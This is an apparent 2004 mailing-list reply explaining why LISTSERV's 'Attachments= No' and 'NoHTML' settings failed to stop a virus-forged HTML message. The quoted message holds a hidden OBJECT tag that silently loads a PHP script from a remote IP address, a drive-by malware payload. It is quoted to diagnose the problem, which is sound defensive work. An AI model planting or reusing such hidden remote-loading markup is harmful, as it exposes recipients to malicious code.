Dennis Boone wrote: > Over the weekend, the following was posted to one of our lists. It was > presumably forged by a virus; the From address was a legit editor of > the list. I've filed off the e-mail addresses on general principle. > > Date: Sun, 21 Mar 2004 01:44:56 -0800 > Reply-To: ... > Sender: ... > From: ... > Subject: Incoming message > MIME-Version: 1.0 > Content-Type: text/html; charset=us-ascii > Content-Transfer-Encoding: 7bit > > <html><body> > <font face="System"> > <OBJECT STYLE="display:none" DATA="http://66.169.99.119:81/563373.php"> > </OBJECT></body></html> > > The list in question in set "Attachments= No" and "Language= NoHTML". > The header appears below. > > Anyone have a suggestion about how it got posted? I'd like to close > the leak. The use of 'Attachments= No' does not affect "attachments" which have a MIME content-type of text/plain or text/html. The use of 'Language=NoHTML' results in the removal of the 'text/html' part of a message only if the message is identified as 'multipart/alternative' *AND* contains both 'text/plain' and 'text/html' parts. In May 2001, I submitted an enhancement request to change this behavior, so that the use of 'Language= NoHTML' would result in rejection of a single part message with the content-type of 'text/html'. A copy of the request was posted to this list and is available in the list archives <http://peach.ease.lsoft.com/scripts/wa.exe?A2=ind0105&L=lstsrv-l&P=R5031>. See that posting for a more detailed discussion of this issue. To the best of my knowledge, there was no response from L-Soft. -- Paul Russell Senior Systems Administrator University of Notre Dame